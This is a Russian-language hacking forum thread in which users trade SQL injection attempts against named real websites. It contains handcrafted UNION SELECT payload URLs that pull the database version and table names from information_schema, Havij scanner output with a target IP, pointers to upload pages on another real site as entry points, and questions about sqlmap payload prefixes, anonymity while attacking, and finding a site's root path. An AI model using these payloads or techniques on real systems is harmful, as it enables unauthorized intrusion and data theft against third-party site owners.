
26.01.2014, 03:30
|
|
Познающий
Регистрация: 26.03.2008
Сообщений: 31
С нами:
9539749
Репутация:
21
|
|
Сообщение от Tigger
Проблема в отсутствии знаний.
http://armtoday.info/default.asp?search=
asd')UNION/**/SELECT/**/1,2,version(),4,5,6--%20a
&submit=%D0%98%D1%81%D0%BA%D0%B0%D1%82%D1%8C&mode= allwords&SectionID=-1&Lang=_Ru
Host IP: 90.156.201.28
Web Server: Microsoft-IIS/8.0у
Powered-by: ASP.NET
Keyword Found: Не
I guess injection type is Integer?! If injection failed, retry with a manual keyword.
DB Server: MySQL
Finding columns count(MySQL,MsSQL 2005): 1
и всё ничего не находит.
|
|
|

26.01.2014, 03:44
|
|
Новичок
Регистрация: 08.04.2010
Сообщений: 1
С нами:
8469890
Репутация:
0
|
|
Сообщение от 2fed
Host IP: 90.156.201.28
Web Server: Microsoft-IIS/8.0у
Powered-by: ASP.NET
Keyword Found: Не
I guess injection type is Integer?! If injection failed, retry with a manual keyword.
DB Server: MySQL
Finding columns count(MySQL,MsSQL 2005): 1
и всё ничего не находит.
Не через мозилу открывай.

|
|
|

26.01.2014, 04:03
|
|
Познающий
Регистрация: 26.03.2008
Сообщений: 31
С нами:
9539749
Репутация:
21
|
|
Сообщение от Tigger
Ну раз хавиж не крутит, значит скули там нету, мне показалось.
а что на счет
http://aztexnika.az/uppload.php
http://aztexnika.az/admin/uppload.php
|
|
|

26.01.2014, 04:06
|
|
Познающий
Регистрация: 26.03.2008
Сообщений: 31
С нами:
9539749
Репутация:
21
|
|
да уж
Сообщение от kingbeef
Не через мозилу открывай.

причем тут мозилла ?))
|
|
|

26.01.2014, 04:48
|
|
Познающий
Регистрация: 26.03.2008
Сообщений: 31
С нами:
9539749
Репутация:
21
|
|
http://armtoday.info/default.asp?search=asd')UNION/**/SELECT/**/1,2,(select/**/unhex(hex(table_name))/**/from/**/information_schema.tables/**/limit/**/0,1),4,5,6-- a&submit=ИÑкать&mode=allwords&S ectionID=-1&Lang=_Ru
|
|
|

26.01.2014, 10:15
|
|
Новичок
Регистрация: 24.01.2014
Сообщений: 1
С нами:
6473846
Репутация:
0
|
|
здравствуйте.
вопрос в следующем. у меня интернет соединение 20кб/с. с таким интернетом дедик юзать не актуально ,как я понимаю(поправьте, если не прав). собственно вопрос, как обезопасить себя. виртуалка? торы? что сделать. простите, на форуме очень много воды, искать нужную информацию просто нет времени.
|
|
|

26.01.2014, 12:35
|
|
Новичок
Регистрация: 13.04.2012
Сообщений: 0
С нами:
7411286
Репутация:
0
|
|
Ребята, прошу, скажите что такое payload и как его задать в ручную в sqlmap(
Если Payload: '"%2bSLEEP(15)--
То --prefix=""%2b"
Так? если так то не идет всеравно
|
|
|

26.01.2014, 13:33
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами:
10992741
Репутация:
0
|
|
Сообщение от BigBanMan
Ребята, прошу, скажите что такое payload и как его задать в ручную в sqlmap(
Если Payload: '"%2bSLEEP(15)--
То --prefix=""%2b"
Так? если так то не идет всеравно
Тебе дали готовый запрос к sqlmap, просто скопируй и вставь в терминал.
|
|
|

26.01.2014, 14:36
|
|
Новичок
Регистрация: 13.04.2012
Сообщений: 0
С нами:
7411286
Репутация:
0
|
|
Сообщение от Zed0x
Тебе дали готовый запрос к sqlmap, просто скопируй и вставь в терминал.
Я бы не просил объяснить если работало бы. Дело в том что и не получается.
|
|
|

27.01.2014, 19:24
|
|
Познающий
Регистрация: 12.03.2012
Сообщений: 40
С нами:
7457366
Репутация:
0
|
|
как найти полный путь к корню сайта
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|